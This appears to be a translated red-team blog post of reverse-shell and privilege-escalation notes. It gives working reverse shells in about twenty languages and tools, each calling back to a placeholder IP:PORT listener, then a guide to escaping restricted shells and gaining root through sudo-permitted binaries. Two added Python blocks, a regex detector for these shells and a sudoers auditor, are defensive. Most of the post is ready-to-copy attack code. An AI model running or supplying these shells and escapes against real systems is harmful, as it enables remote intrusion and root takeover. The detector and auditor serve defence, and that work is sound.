
    Red Team Notes: Shell Cheat Sheet

    VSole, 2022-04-12 16:00:58

    Preface

    Recommended to copy and paste straight into your notes, or like and bookmark it, since it gets used often. This is a compiled set of notes on common reverse shells and privilege escalation; essential knowledge for red team members!

    The most complete.

    Reverse Shell Cheat Sheet

    Usually, after obtaining remote code execution we want some interactive access, rather than issuing one command for one response or working through a web shell. In practical terms a reverse shell is very necessary; the following is organized by tool.

    nc

    listen:

    nc -nlvp PORT
    

    connect:

    nc -e /bin/sh IP PORT
    

    or

    nc -c sh IP PORT
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
    

    socat

    listen:

    socat tcp-listen:PORT -
    

    connect:

    socat exec:/bin/sh tcp:IP:PORT
    

    Interactive version

    listen:

    socat file:`tty`,raw,echo=0 tcp-listen:PORT
    

    connect:

    socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
    

    ncat

    listen:

    ncat --allow IP -vnl PORT --ssl
    

    connect:

    ncat --exec /bin/sh --ssl IP PORT
    

    sbd

    listen:

    sbd -lp PORT
    

    connect:

    sbd -e /bin/sh HOST PORT
    

    Encrypted version

    listen:

    sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
    

    connect:

    sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
    

    bash

    TCP

    bash -i >& /dev/tcp/IP/PORT 0>&1
    

    or

    bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'
    

    Using nc with the UDP protocol, listen:

    nc -u -lvp PORT
    

    connect:

    sh -i >& /dev/udp/IP/PORT 0>&1
    

    php

    Simple PHP one-liner version:

    php -r '$sock=fsockopen("IP", PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    Full PHP script, with a form for specifying the IP address and port to connect to:

    <?php
    if (empty($_POST['i']) || empty($_POST['p'])) {
        echo "IP address and port not specified!";
    }
    else
    {
        $ip = $_POST["i"];
        $port = $_POST["p"];
        $shell = 'uname -a; w; id; /bin/sh -i';
        $chunk_size = 1400;
        $write_a = null;
        $error_a = null;
        $process = null;
        $pipes = null;
        $errno = "";
        $errstr = "";
        // connect back to the listener
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            echo "$errstr ($errno)";
            exit(1);
        }
        // stdin/stdout/stderr of the child shell as pipes
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = proc_open($shell, $descriptorspec, $pipes);
        if (!is_resource($process)) {
            echo "ERROR: Can't spawn shell";
            exit(1);
        }
        stream_set_blocking($pipes[0], 0);
        stream_set_blocking($pipes[1], 0);
        stream_set_blocking($pipes[2], 0);
        stream_set_blocking($sock, 0);
        // relay: socket -> shell stdin, shell stdout/stderr -> socket
        while (!feof($sock) && !feof($pipes[1])) {
            $read_a = array($sock, $pipes[1], $pipes[2]);
            $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
            if (in_array($sock, $read_a)) {
                $input = fread($sock, $chunk_size);
                fwrite($pipes[0], $input);
            }
            if (in_array($pipes[1], $read_a)) {
                $input = fread($pipes[1], $chunk_size);
                fwrite($sock, $input);
            }
            if (in_array($pipes[2], $read_a)) {
                $input = fread($pipes[2], $chunk_size);
                fwrite($sock, $input);
            }
        }
        fclose($sock);
        fclose($pipes[0]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
    }
    ?>
    

    Perl

    perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    

    Python

    Python script version:

    #!/usr/bin/env python
    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("IP", PORT))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"])
    

    Or from the command line with python -c:

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP", PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
    

    Ruby

    #!/usr/bin/ruby
    require 'socket';
    c=TCPSocket.new('IP', PORT)
    $stdin.reopen(c)
    $stdout.reopen(c)
    $stderr.reopen(c)
    $stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
    

    Or as a one-liner:

    ruby -rsocket -e'f=TCPSocket.open("IP", PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    

    Golang

    Create a file from the source, run it, then delete the source file:

    package main

    import (
        "net"
        "os/exec"
    )

    func main() {
        // connect back, then attach the shell's stdio to the connection
        c, _ := net.Dial("tcp", "IP:PORT")
        cmd := exec.Command("/bin/sh")
        cmd.Stdin = c
        cmd.Stdout = c
        cmd.Stderr = c
        cmd.Run()
    }
    

    Save the file, e.g. as test.go, then build and run it: go run test.go

    Or directly from the command line

    echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP:PORT");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/test.go && go run /tmp/test.go && rm /tmp/test.go
    

    Powershell

    $address = 'IP'
    $port = 'PORT'
    function cleanup {
        if ($client.Connected -eq $true) {$client.Close()}
        if ($process.ExitCode -ne $null) {$process.Close()}
        exit
    }
    $client = New-Object System.Net.Sockets.TcpClient
    $client.Connect($address, $port)
    $stream = $client.GetStream()
    $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
    # spawn cmd.exe with all three standard streams redirected
    $process = New-Object System.Diagnostics.Process
    $process.StartInfo.FileName = 'C:\windows\system32\cmd.exe'
    $process.StartInfo.RedirectStandardInput = 1
    $process.StartInfo.RedirectStandardOutput = 1
    $process.StartInfo.RedirectStandardError = 1
    $process.StartInfo.UseShellExecute = 0
    $process.Start()
    $inputstream = $process.StandardInput
    $outputstream = $process.StandardOutput
    Start-Sleep 1
    $encoding = New-Object System.Text.AsciiEncoding
    # send the initial banner/prompt of cmd.exe to the listener
    while ($outputstream.Peek() -ne -1) {$out += $encoding.GetString($outputstream.Read())}
    $stream.Write($encoding.GetBytes($out), 0, $out.Length)
    $out = $null; $done = $false; $testing = 0;
    while (-not $done) {
        if ($client.Connected -ne $true) {cleanup}
        $pos = 0; $i = 1
        # read from the socket until a newline arrives or the buffer is full
        while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
            $read = $stream.Read($networkbuffer, $pos, $networkbuffer.Length - $pos)
            $pos += $read
            if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}
        }
        if ($pos -gt 0) {
            $string = $encoding.GetString($networkbuffer, 0, $pos)
            $inputstream.write($string)
            Start-Sleep 1
            if ($process.ExitCode -ne $null) {cleanup}
            else {
                $out = $encoding.GetString($outputstream.Read())
                while ($outputstream.Peek() -ne -1) {
                    $out += $encoding.GetString($outputstream.Read())
                    if ($out -eq $string) {$out = ''}
                }
                $stream.Write($encoding.GetBytes($out), 0, $out.Length)
                $out = $null
                $string = $null
            }
        } else {cleanup}
    }
    

    Or as a one-liner:

    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP', PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    

    nodejs

    Create a js file:

    var net = require("net"), sh = require("child_process").exec("/bin/bash");
    var client = new net.Socket();
    client.connect(PORT, "IP", function () {
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    

    or

    require("child_process").exec('bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"')
    

    or

    var x = global.process.mainModule.require
    x('child_process').exec('nc IP PORT -e /bin/bash')
    

    Then run:

    nodejs rev.js
    

    Or execute the command directly

    nodejs -e "require('child_process').exec('nc -e /bin/sh IP PORT')"
    

    Version without nc:

    nodejs -e "require('child_process').exec('bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')"
    

    openssl

    listen:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
    

    connect:

    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s
    

    Awk

    Connects to the listener; typing exit closes the reverse shell

    awk 'BEGIN {s = "/inet/tcp/0/IP/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
    

    Lua

    lua -e "require('socket');require('os');t=socket.tcp();t:connect('IP','PORT');os.execute('/bin/sh -i <&3 >&3 2>&3');"
    

    Java

    Linux

    import java.net.Socket;
    import java.io.OutputStream;
    import java.io.InputStream;
    public class Rev {
      public static void main(String[] args) {
        String host = "IP";
        int port = PORT;
        String cmd = "/bin/sh";
        try {
          Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
          Socket s = new Socket(host, port);
          InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
          OutputStream po = p.getOutputStream(), so = s.getOutputStream();
          while (!s.isClosed()) {
            while (pi.available() > 0) so.write(pi.read());
            while (pe.available() > 0) so.write(pe.read());
            while (si.available() > 0) po.write(si.read());
            so.flush(); po.flush();
            Thread.sleep(50);
            try { p.exitValue(); break; } catch (Exception e) {}
          }
          p.destroy();
          s.close();
        } catch (Exception e) {}
      }
    }
    

    Windows

    import java.net.Socket;
    import java.io.OutputStream;
    import java.io.InputStream;
    public class Rev {
      public static void main(String[] args) {
        String host = "IP";
        int port = PORT;
        String cmd = "cmd.exe";
        try {
          Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
          Socket s = new Socket(host, port);
          InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
          OutputStream po = p.getOutputStream(), so = s.getOutputStream();
          while (!s.isClosed()) {
            while (pi.available() > 0) so.write(pi.read());
            while (pe.available() > 0) so.write(pe.read());
            while (si.available() > 0) po.write(si.read());
            so.flush(); po.flush();
            Thread.sleep(50);
            try { p.exitValue(); break; } catch (Exception e) {}
          }
          p.destroy();
          s.close();
        } catch (Exception e) {}
      }
    }
    

    Groovy

    Linux

    String host="IP";
    int port=PORT;
    String cmd="/bin/bash";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
    while(!s.isClosed()) {
     while(pi.available()>0)
      so.write(pi.read());
     while(pe.available()>0)
      so.write(pe.read());
     while(si.available()>0)
      po.write(si.read());
     so.flush();
     po.flush();
     Thread.sleep(50);
     try {p.exitValue();
      break;
     }
     catch (Exception e){}
    };
    p.destroy();
    s.close();
    

    Run from the command line:

    groovy -e 'String host="IP";int port=PORT;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'
    

    Or run it in a thread:

    Thread.start {
     String host="IP";
     int port=PORT;
     String cmd="/bin/bash";
     Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
     InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
     OutputStream po=p.getOutputStream(),so=s.getOutputStream();
     while(!s.isClosed()){
      while(pi.available()>0)
       so.write(pi.read());
      while(pe.available()>0)
       so.write(pe.read());
      while(si.available()>0)
       po.write(si.read());
      so.flush();
      po.flush();
      Thread.sleep(50);
      try {
       p.exitValue();break;
     }
      catch (Exception e){}
     };
     p.destroy();
     s.close();
    }
    

    Windows

    String host="IP";
    int port=PORT;
    String cmd="cmd.exe";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
    while(!s.isClosed()){
     while(pi.available()>0)
      so.write(pi.read());
     while(pe.available()>0)
      so.write(pe.read());
     while(si.available()>0)
      po.write(si.read());
     so.flush();
     po.flush();
     Thread.sleep(50);
     try {
      p.exitValue();
      break;
     }catch (Exception e){}
    };
    p.destroy();
    s.close();
    

    One-liner:

    groovy -e 'String host="IP";int port=PORT;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'
    

    C

    Create a file

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    int main(void) {
      int sockfd;
      int lportno = PORT;
      struct sockaddr_in serv_addr;
      char *const params[] = {"/bin/sh", NULL};
      char *const envp[] = {NULL};   /* empty environment for the shell */
      sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
      serv_addr.sin_family = AF_INET;
      serv_addr.sin_addr.s_addr = inet_addr("IP");
      serv_addr.sin_port = htons(lportno);
      connect(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
      /* wire stdin/stdout/stderr to the socket, then replace the process with a shell */
      dup2(sockfd, 0);
      dup2(0, 1);
      dup2(0, 2);
      execve("/bin/sh", params, envp);
      return 0;
    }
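
    All of the above leave the same trace on the host: an interpreter or shell whose standard descriptors are wired to a socket, or an nc/socat/sbd invocation that execs a shell. The detector below is an added example, not part of the original post: it matches process command lines (as logged by auditd execve records or an EDR) against indicator regexes derived from this page's own one-liners; the sample command lines and the listener address 10.0.0.5:4444 are constructed.

```python
import re

# Regexes derived from the reverse-shell one-liners collected on this page.
# They are a starting point for a detection rule, not an exhaustive signature set.
INDICATORS = [
    ("bash-dev-tcp-udp", re.compile(r"/dev/(tcp|udp)/[\w.:-]+/\d+")),
    ("nc-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s(-e|-c|--exec)\s")),
    ("fifo-pipe-shell", re.compile(r"mkfifo\b.*\|\s*(nc|ncat|openssl)\b")),
    ("socat-exec", re.compile(r"\bsocat\b.*\bexec:/bin/(ba)?sh")),
    ("sbd-exec", re.compile(r"\bsbd\b.*\s-e\s*/bin/")),
    ("php-fsockopen-exec", re.compile(r"fsockopen\(.*\bexec\(")),
    ("perl-socket-exec", re.compile(r"use Socket;.*exec\(")),
    ("python-dup2-shell", re.compile(r"os\.dup2\(.*subprocess\.call\(")),
    ("ruby-tcpsocket-exec", re.compile(r"TCPSocket\.(new|open)\(.*\bexec\b")),
    ("node-child-process-exec", re.compile(r"child_process.*\.exec\(")),
    ("powershell-tcpclient-iex", re.compile(r"TCPClient\(.*\biex\b", re.I)),
    ("openssl-s_client-shell", re.compile(r"/bin/sh.*openssl s_client")),
]


def classify(cmdline: str) -> list:
    """Return the names of every indicator that matches one process command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan(cmdlines):
    """Map each suspicious command line to its indicators; clean lines are omitted."""
    return {line: hits for line in cmdlines if (hits := classify(line))}


# Constructed sample command lines (10.0.0.5:4444 is a made-up listener), in the
# form they would take in an execve audit record or a process-creation log.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "nc -e /bin/sh 10.0.0.5 4444",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'",
    "nc -zv 10.0.0.5 22",                    # benign: port check, no -e/-c
    "/usr/bin/python3 /opt/app/worker.py",   # benign
    "bash -c 'echo hello'",                  # benign
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits):26} {line[:70]}")
```

Regex-only matching is evadable (base64 wrappers, variable expansion), so pair it with a network-level check for outbound connections from shells and interpreters.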
    

    Shell Escape Guide

    Vim

    :sh
    :!/bin/bash
    

    rVim

    rvim --cmd ":py import os;os.system('/bin/bash')"
    

    or

    :python import os; os.system("/bin/bash")
    

    nano / pico

    Run nano directly:

    nano -s /bin/bash
    

    then type into the text buffer:

    /bin/bash
    

    and press Ctrl-T to run the spell checker

    man, less, more

    !shell
    !/bin/bash
    

    Awk

    awk 'BEGIN {system("/bin/sh")}'
    

    find

    find /dev/zero -exec /bin/bash \;
    

    rbash

    bash < 4.4

    BASH_CMDS[poop]=/bin/bash;poop
    

    Reading files:

    $(< ../../etc/passwd)
    

    or

    mapfile ARRAY < ../../etc/passwd
    echo "${ARRAY[@]}"
    

    Connect over ssh without loading the profile:

    ssh user@IP-ADDRESS -t "bash --noprofile"
    

    Python

    python
    >>> import os; os.system('/bin/bash')
    

    MySQL client

    mysql>\! bash
    bash>
    

    gdb

    (gdb) ! id
    (gdb) ! /bin/bash
    (gdb) shell id
    

    Netcat, ncat

    nc -vlp PORT -e /bin/bash
    nc HOST PORT
    

    Nmap

    nmap --script <(echo 'os.execute("/bin/sh")')
    

    Via a script

    nmap --script /tmp/script.nse
    

    with script.nse containing

    os.execute("id")
    

    tcpdump

    cat > shell.sh <<EOF
    #!/bin/bash
    /bin/bash
    EOF
    chmod +x shell.sh
    sudo tcpdump -G 1 -z ./shell.sh -w 1.pcap
    

    To execute a script while reading a file, with test.sh containing

    #!/bin/sh
    id
    

    create a test.pcap larger than 1 MB and run tcpdump

    tcpdump -r /tmp/test.pcap -C 1 -w /dev/null -z /tmp/test.sh
    

    tar

    tar c --checkpoint=1 --checkpoint-action=exec=bash a a.tar
    

    zip

    zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
    

    strace

    strace -o/dev/null /bin/bash
    

    expect

    expect -c 'spawn sh; interact'
    

    SCP

    cat >/tmp/shell.sh <<EOF
    /bin/bash >&2 0>&2
    EOF
    chmod +x /tmp/shell.sh
    scp -S /tmp/shell.sh x y:
    

    ssh

    ssh -o ProxyCommand=/tmp/shell.sh localhost
    

    git

    git -c core.pager=/tmp/shell.sh --paginate help
    

    or

    git commit
    

    Or using rebase

    git rebase --exec "COMMAND" master
    

    Or:

    git rebase -ix "COMMAND" master
    

    script

    script -c /bin/bash /tmp/a
    

    mount

    user@host:~$ sudo mount -o bind /bin/bash /bin/mount
    user@host:~$ sudo mount
    root@host:~# id
    uid=0(root) gid=0(root) groups=0(root)
    

    mail

    GNU version only:

    sudo mail --exec='!/bin/sh'
    

    Other:

    sudo -u USER mail -u USER -s xxxx aaa
    ~!id
    

    sqlite

    sqlite3 /dev/null '.shell /bin/sh'
    

    By loading an extension, with /tmp/shell.c containing:

    #include <unistd.h>
    int main(void)
    {
        /* called by sqlite as the extension entry point; arguments are ignored */
        execl("/bin/sh", "sh", (char *)NULL);
        return 0;
    }
    

    Compile it as a .so

    gcc -g -fPIC -shared /tmp/shell.c -o /tmp/shell.so
    

    Load the extension from the sqlite shell:

    sqlite> .load /tmp/shell.so main
    

    socat

    socat file:/bin/sh file:sh,create,perm=4755 > /dev/null
    ./sh
    

    or

    socat exec:/bin/sh -
    

    apt-get / apt / aptitude

    a:

    apt-get update -o APT::Update::Pre-Invoke::="/bin/bash -i"
    

    b:

    sudo apt-get changelog apt
    !/bin/sh
    

    openssl

    Read a file:

    openssl enc -in test.txt
    

    Write a file:

    LFILE=file_to_write
    echo DATA | openssl enc -out "$LFILE"
    

    or

    LFILE=file_to_write
    TF=$(mktemp)
    echo "DATA" > $TF
    openssl enc -in "$TF" -out "$LFILE"
    

    Python

    >>> import pty
    >>> pty.spawn('/bin/bash')
    

    or

    >>> import os
    >>> os.system('ls')
    >>> os.system('/bin/bash')
    

    Ruby

    ruby -e 'exec "/bin/sh"'
    

    or

    irb
    irb(main):001:0> exec '/bin/bash'
    

    Perl

    perl -e 'exec "/bin/sh";'
    

    Lua

    os.execute('/bin/sh')
    

    or

    lua -e 'os.execute("/bin/sh")'
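
    Every binary in the escape guide above turns a narrowly scoped sudo rule into a root shell, so the practical defensive check is to audit sudoers for them. The script below is an added example, not from the original post: it parses the user-specification lines of a sudoers file and flags any command whose binary is on this page's list. The sudoers text is constructed, and the parser assumes the simple subset (no aliases, line continuations or @include directives).

```python
import re

# Binaries this page shows can spawn a shell or read/write arbitrary files.
# Granting any of them via sudo, or leaving it setuid, defeats a restricted shell.
SHELL_ESCAPE_BINARIES = {
    "vim", "rvim", "nano", "pico", "man", "less", "more", "awk", "find", "python",
    "mysql", "gdb", "nc", "ncat", "nmap", "tcpdump", "tar", "zip", "strace",
    "expect", "scp", "ssh", "git", "script", "mount", "mail", "sqlite3", "socat",
    "apt-get", "apt", "aptitude", "openssl", "ruby", "irb", "perl", "lua",
}

# user  host = (runas) TAG: cmd1, cmd2 ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Yield (user, runas, [commands]) per user-spec line; comments and Defaults are skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        yield m.group("who"), (m.group("runas") or "root").strip(), cmds


def risky_rules(text):
    """Return [(user, runas, command, basename)] for commands whose binary can escape to a shell."""
    findings = []
    for who, runas, cmds in parse_sudoers(text):
        for cmd in cmds:
            if cmd == "ALL":
                continue  # unrestricted sudo is a separate finding, not an escape case
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                findings.append((who, runas, cmd, binary))
    return findings


# Constructed sudoers content for demonstration; not taken from a real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/sbin/tcpdump, /bin/tar
www     ALL=(root) /usr/bin/git, /usr/bin/systemctl restart nginx
dev     ALL=NOPASSWD: /usr/bin/vim /etc/hosts   # argument does not help: vim has :sh
"""

if __name__ == "__main__":
    for who, runas, cmd, binary in risky_rules(SAMPLE_SUDOERS):
        print(f"{who} may run {cmd!r} as {runas}: {binary} can spawn a shell")
```

Restricting arguments in the rule (as the vim line does) does not close the hole, because the escape happens inside the program after it starts.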
    
    This work is published under a CC license; reposting must credit the author and link to this article.